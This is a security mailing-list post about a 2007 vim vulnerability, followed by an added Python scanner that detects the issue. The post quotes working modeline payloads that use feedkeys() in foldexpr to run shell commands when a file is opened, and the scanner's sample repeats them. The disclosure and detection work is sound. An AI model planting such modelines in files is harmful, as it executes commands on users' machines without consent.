Full Disclosure mailing list archives

Subject: So, so you think you can tell April 1 joke from a 0day?
From: Georgi Guninski <guninski () guninski com>

Date: Sun, 1 Apr 2012 17:26:52 +0300

On Sun, 1 Apr 2007 03:26:30 -0400 (EDT) someone posted a message to fd with subject "April 1 joke" [1].

The body of the message appeared to me as not obfuscated vim 0day:

vim: foldmethod=expr:foldexpr=feedkeys("\\<esc>\\x3a%!cat\\x20-n\\<CR>\\<esc>\\x3a%s/./\:)/g\\<CR>\\<esc>\\x3aq!\\<CR>"):

The thread had 4 emails.

On 2007-04-26 21:35 [2] on vim-dev:

> today somebody came to #vim, and pasted some modeline (containing joke or such). He muttered something about not knowing what that means and left before long. But (!) what I noticed is that feedkeys() was used as part of foldexpression and it turned out that feedkeys() is allowed in sandbox, which means malicious file can run arbitrary command via modeline like this:
>
> vim: fdm=expr fde=feedkeys("\\:!touch\ phantom_was_here\\<cr>")

Redhat's bug is at [3].

Appears to me the CVE assigning monkeys and Secunia didn't notice the 0day.

So, so you think you can tell April 1 joke from a 0day?

[1]: http://seclists.org/fulldisclosure/2007/Apr/0
[2]: http://marc.info/?l=vim-dev&m=117762581821298
[3]: https://bugzilla.redhat.com/show_bug.cgi?id=238259
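A defender-side check for the pattern described in the message above, added here as an example and not part of Guninski's post or the vim project: it scans text for vim modelines and flags any that call feedkeys() inside an expression-valued option (the post's fdm=expr / fde=feedkeys(...) case). The regexes and the constructed sample text are assumptions of this example; the two flagged modelines are the ones quoted in the post.

```python
import re

# A vim modeline is "vi:", "vim:", "Vim:" or "ex:" at the start of a line or
# after whitespace, followed by options separated by spaces or colons
# (or "set opt opt:" in the second form). Regex is a best-effort approximation.
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|Vim|ex):\s*(?P<opts>.*)$")

# Options whose value is an expression that vim evaluates (in the sandbox when
# set from a modeline). The post's cases are foldexpr / its short form fde.
EXPR_OPTIONS = ("foldexpr", "fde", "includeexpr", "inex",
                "indentexpr", "inde", "formatexpr", "fex")


def scan_modelines(text):
    """Return (line_no, option, modeline) for every modeline that calls feedkeys().

    The vim-dev report quoted above is that feedkeys() was reachable from the
    sandbox, so a feedkeys() call in any expression option of a modeline is the
    signature of interest; 'option' names the expression option carrying it,
    or 'unknown' if the call sits somewhere the regex does not recognise.
    """
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = MODELINE_RE.search(line)
        if not m or "feedkeys(" not in m.group("opts"):
            continue
        opts = m.group("opts")
        option = "unknown"
        for name in EXPR_OPTIONS:
            # an option assignment follows the start, whitespace or a ':' separator
            if re.search(r"(?:^|[\s:])%s=" % re.escape(name), opts):
                option = name
                break
        hits.append((line_no, option, line.strip()))
    return hits


# Constructed sample: one benign modeline plus the two modelines quoted in the post.
SAMPLE = r"""plain text, no modeline here
# vim: set ts=4 sw=4 et:
vim: foldmethod=expr:foldexpr=feedkeys("\\<esc>\\x3a%!cat\\x20-n\\<CR>\\<esc>\\x3a%s/./\:)/g\\<CR>\\<esc>\\x3aq!\\<CR>"):
more text
vim: fdm=expr fde=feedkeys("\\:!touch\ phantom_was_here\\<cr>")
"""

if __name__ == "__main__":
    for line_no, option, modeline in scan_modelines(SAMPLE):
        print("line %d: feedkeys() via %s -> %s" % (line_no, option, modeline))
```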